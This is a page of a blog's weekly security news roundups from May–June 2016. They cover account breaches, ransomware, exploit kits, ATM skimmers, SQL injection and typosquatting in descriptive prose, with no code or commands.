Security Roundup - 2016-06-16

Verizon has had two communication redirect issues this week. The first is where one determined hacker convinced a Verizon rep to change a phone number to a new SIM. This allowed the attacker to receive all calls/texts to a phone they controlled, intercepting 2 factor auth tokens. Similarly, Verizon recently patched a system vulnerability that would allow attackers to redirect a victim’s email to an account of their choosing, which would have allowed an attacker to redirect any password reset emails for accounts Verizon customers might have associated with their accounts.

TeamViewer has been having a rough time, with a lot of their customers having their machines accessed. Speculation abounds around whether these accounts were hacked due to leaked passwords via one of the many, many recent breaches or whether TeamViewer has had a breach themselves.

Twitter felt the weight of a password leak this week and has already proactively started resetting passwords for some accounts. Similar to the TeamViewer incident, the current belief is that these have been cross referenced from other breaches. Twitter indicates they are proactively cross referencing and resetting accounts as breaches come to light.

iMesh, a company that recently out of business, ALSO had old breached account data surface this week. Based on available records, this break might have occured in 2013 and 51 million accounts, including passwords which were hashed using MD5.

The Windows Background Intelligent Transfer Service (BITS), used by Windows to asyncronously fetch things like software updates, has been exploited to infect and re-infect systems by leveraging the “notification” feature to schedule persistent updates. As BITS is a trusted service, this allowed malware downloads from being triggered as potentially malicious activity by some monitoring systems.

That is not the biggest vulnerability that Microsoft has patched though. “Badtunnel” is an escalation attack which can be triggered with a variety of medium and allows an attacker to hijack traffic and gain control of remote machines. Versions of windows going back to Windows 95 are impacted by this vulnerability.

Krebs has another fascinating/terrifying update on ATM insert skimmers. This one contains videos of how they actually work, and how hard they would be to detect in real life.

Ever wonder how a ransomware-as-a-service ring works? Business insider has an interview with Flashpoint Intel, who convinced one russian ransomware boss to make them part of his ring.

Similar to the recent abrupt shutdown of TeslaCrypt, it looks like the Angler Exploit Kit has shut down, with malware campaigns migrating to a variety of other exploit kits.

Security Roundup - 2016-06-09

Two big reports have landed this week.

The first is an analysis from Rapid 7 and their Project Sonar, called the National Exposure Index. It provides details on some of the most popular open ports on the internet today. Some interesting observations, including the adoption of secure alternatives to a number of protocols is still lower than the non-encrypted versions (POP3, SMTP, HTTP, IMAP), with the exception of SSH vs Telnet. That being said, there are still a lot of things responding as Telnet, and the authors are (rightfully worried) by the fact that there are still so many devices using Telnet on the internet. “Most services on the internet are unencrypted, which is worrisome for any standards or enforcement body charged with keeping up a reasonable security profile for an organization.”

The second is Akamai’s State of the Internet report. This report looks at attack trends that Akamai sees over their network. Some surprising things include: ‘mega attacks’ (> 100 Gbps) have increased by 280% since last quarter. There is a big jump of 87% in SQL injection attacks since last quarter. More web app attacks are coming over HTTPS, possibly due to the increased roll out of HTTPS across sites. Reflectors, using common internet services like NTP and DNS are increasingly used in DDoS attacks, with NTP reflection jumping 71%.

Related to the uptick in NTP reflection, ThreatPost reports on a number of NTP flaws that allow for Denial of Service attacks. These have all been disclosed and patched, so we will see if next quarter’s State of the Internet report shows a corresponding drop in this type of DDoS.

The more payment processing news I read, the more convinced I am that maybe I should just switch back to cash that I get straight from a teller at a physical bank. The latest example is another Krebs article on a Point of Sale Botnet that has probably harvested more than 1.2 million credit cards. It seems that the impacted restaurants are victims of social engineering, giving access to remote individuals so they can run some ‘support tasks’.

I came across this fascinating extension to typosquats, where someone decided to apply the concept to software packages. By setting up a number of packages with slightly different names, containing an application that just reported statistics to him, the author received a number of hits from 17289 different servers over a short period of time. Of these, 43.6% of them updated the packages with admin rights.

Discussion on the above led me to another interesting article on bitsquating, which are like typosquats but based on differences in bits, so random fluctuations in memory/cosmic rays could conceivably send someone to an incorrect website.

Sucuri points out that forms will allow data theft if your site is ever hacked, and this makes payment processing hard by going over a Magento payment processing plugin for Braintree. Attackers essentially used the extension’s own information collection facilities to harvest credit card and user information and send it somewhere remote for collection.

MalwareTech did a good job busting that Cerber became polymorphic by generating a new hash every 15 seconds. Coincidentally, Fortinet has an article demonstrating how a piece some malware becomes polymorphic by re-encrypting some functions on each use, meaning the malware signature changes on an individual machine over its lifetime.

Checkpoint recently pointed out a flaw in Facebook’s Messenger platform, which would allow someone to modify messages. Following malware trends, they posit that flaws like these would allow a malicious actor to constantly update landing pages for malware, as other products begin detecting them and blocking URLs, thus lengthening the amount of time for someone to click through and become infected.

BleepingComputer has the best roundup in ransomware news. This week features Ransomware updates (including CryptXXX rebranding as UltraCrypter!), as well as new kids on the block with BlackShades (which taunts security researchers) and JuicyLemon, which interestingly asks people to email a certain address for instructions.

Security Roundup - 2016-06-02

LinkedIn is apparently not the only service to have a large number of user accounts come to light this month. MySpace (breach between 2007 to 2010), Tumblr (2013), and Fling (2011) are all data sets that have apparently been lying dormants, but add up to 642 million user accounts. Troy Hunt of Have I Been Pwned has indicated these 4 breaches are in the top 5 of the 109 breaches he has recorded to date.

World renowned password cracker Jeremi M Gosney has an article on “How LinkedIn’s password sloppiness hurts us all”. He has worked with teams to crack 98% of the LinkedIn password data and they managed to do so in 6 days. End result is a large corpus of actual user password data which can be used as a wordlist, to analyze to create newer/better fuzzing rules, and overall makes slow-hashing functions like BCrypt and Argon2 less effective since password crackers will potentially require less attempts to break into accounts.

Microsoft, meanwhile, has announced an initiative to better protect user passwords. One layer actively bans bad passwords, which Microsoft collects more and more data on based on attacks. Another layer actively locks out accounts with attempts meeting a certain criteria and actively notifies an account holder. These features are being rolled out to Azure AD in a limited beta.

In terms of randomness, TOR goes to great lengths to generate enough randomness to encrypt all communications across its network. Naked Security has an article on how Tor generates randomness such that poisoned nodes don’t undermine the network as a whole.

For those procuring workstations for their employees, be sure to read this Duo article on OEM Updater Security. Duo managed to find vulnerabilities in all OEM Updater software that would allow them to execute arbitrary commands as a system user. While some attempts were made to harden updaters, more often than not some basic security measures (TLS communication, update validation, manifest validation) were not done.

The Internet Crime Complaint Centre has published their 2015 report. Highlights include: wire transfer fraud via phishing attacks have losses of over $263 million reported, corporate data breaches resulted in ~$39 million in losses, and malware compromised ~$5 million in losses with ransomware breaking the 1 million mark with ~$1.6 million in losses.

Checkpoint has an updated write up of CryptXXX. Evolving out of TeslaCrypt, CryptXXX seems to be serving their code as a DLL, and then using Windows binaries to execute the code at some later time. Since there is no base executable, this evades many sandboxes. CryptXXX takes this one step further by delaying execution, to further thwart any sandboxing.

This week I learned about some implementations of TLS have apparently failed to respect nonce uniqueness when setting up connections, thus opening the opportunity for forgery attacks against HTTPS sites. Unfortunately, some VISA sites have been discovered to have this issue.

Security Roundup - 2016-05-26

Malware targeting wireless networking equipment has been making the rounds, impacting several ISPs. Despite a patch being available last July, many users appear to have been unaware and not updated. The malware in question leaves a backdoor in a large range of devices, but otherwise appears to do no other malicious activitiy at this time.

Malware on USB devices, and a user’s ability to plug in USB devices can allow for deep network penetration. Checkpoint has a story where parts of a nuclear facility were infected. While restricted networks were not infected, a number of USB devices were, which could have resulted in cross contamination.

As more campaigns move away from TeslaCrypt and over to CryptXXX, TeslaCrypt has apparently shut down and released a master decryption key. Interestingly, Kaspersky has defeated CryptXXX this week and has updated their unlocker for it, resulting in CryptXXX releasing a new version which was again promptly defeated.

A number of security researchers have blogged about obfuscation this week. Checkpoint has an interesting article on how Spear Phishing malware attacks are starting to include sandbox/analysis tool detection and evasion techniques to slow down malware researchers. Sucuri has a fun article on how a Joomla backdoor used multiple obfuscation techniques. And Fortinet has an interesting article on android malware, which again has checks around whether or not it is running in a virtual environment, and encrypts outbound communication. Finally, ThreatPost has a writeup of a new Microsoft Office macro obfuscation technique where payloads are stored in the names of buttons, and triggered when clicked.

In further, “I don’t know if I will ever use an ATM again” news, I’ve learned that some criminals implement skimmer malware, rather than just skimmer hardware. Initially popular between 2010 and 2013, Kaspersky Labs recently discovered a new variant after being asked to investigate a bank robbery where nothing was stolen. Said malware activates when a specific keycard is used, allowing a user to do things ranging from spitting out ids and pins, dispensing cash, or receiving an update.

A breach of LinkedIn data impacted 6.5 million users in 2012. Recently it was discovered that another 117 million users might be impacted, with those accounts surfacing this week. Security experts are dissatisfied with LinkedIn’s approach to reseting only known impacted accounts, an action that has resulted in these 117 million users being targeted years later. Troy Hunt has an interesting followup where he talks about LinkedIn’s response, the impact on breach disclosure on leaked information prices, and phishing events surrounding leak disclosures (because people are expecting password resets!).

A follow up to my previous coverage of MITRE, one security professional has complained about the difficulty of getting CVE numbers assigned to found vulnerabilities, resulting in setting up websites to disclose vulnerabilites as a result. MITRE has scrapped the previous decentralized proposal, meaning that they are still being overwhelmed with CVE requests.

A coworker of mine recently introduced me to the concept of Pastejacking, by which an attacker overrides the contents of the clipboard. If copied content looks innocent and is something that is pasted into a terminal, for example, it results in a user accidentally executing potentially malicious code.

Security Roundup - 2016-05-18

With the new season of Mr. Robot on the way, fans are giving the site some additional security scrutiny. One user found an XSS vulnerability that would allow a malicious actor to harvest Facebook profile information, while another found a blind sql injection allowing access to a collected mailing list.

Who hacks the hackers? I am not sure, but hacker forum Nulled.io was hacked recently and their information dumped. On initial review, it appears that the software powering their site might have suffered from numerous vulnerabilities that were not addressed.

Cloudflare has an article on blind sql injection via User Agent parameter. In this case, the injection vector asks the database to sleep for a period of time. An attacker knows that the injection has worked if the web request returns after the period of time in which they have tried to make the database sleep. Once sql injection is confirmed, an attacker can use things like try to enumerate users passively or, if something like blogging software with a known DB structure, do a query to inject database values into a comments table for retrieval.

DarkReading has an interesting article on ‘10 Years Of Human Hacking’, further detailing how easy it is to get users to plug in malware laden USB drives. One story involves a marketing department taking a box worth of infected USB devices (part of a pen test) to a conference to use as giveaways.

IBM is teaching Watson to fight crime. Cybercrime, that is. Teaming up with a number of universities, the plan involves feeding security datapoints into Watson, so that Watson can learn, and start to detect patterns and emerging threats.

Biometrics followup. The FBI doesn’t feel that privacy laws should apply to their ever growing biometrics database. Meanwhile, some researchers from Binghamton University have designed a new biometric, brainwaves. Their technique involves the brain response to a series of images, which they currently feel is 100% accurate. As this biometric is influenced by external stimuli, it has the added advantage in that it can be changed. The downside? Currently needing at least 27 images (at one image per second), oh and having to wear a cap of electrodes in order to measure the response.

Those interested in learning more about ‘ransomware-as-a-service’ will probably be interested in Checkpoint’s great rundown of the Nuclear Exploit Kit. Nuclear allows anyone willing to pay to launch ‘malware campaigns’, complete with fancy dashboards and statistics.

Attackers continue to exploit point of sale terminals, starting with Wendy’s owning up to a major data breach targeting their POS system. Said breach ‘only’ impacted a secondary POS system at 5% of their North American restaurants, but had major impact to several credit unions who had previously reported fraud stemming from Wendy’s customers. Meanwhile, Fireye recently discovered an exploit for Windows based POS terminals, which they dub ‘Punchbuggy’, which would have allowed full access to the PoS system. Is it any surprise that the PCI Security Standards Council will be requiring better security measures for companies that accept payment information.

Page 18 of 23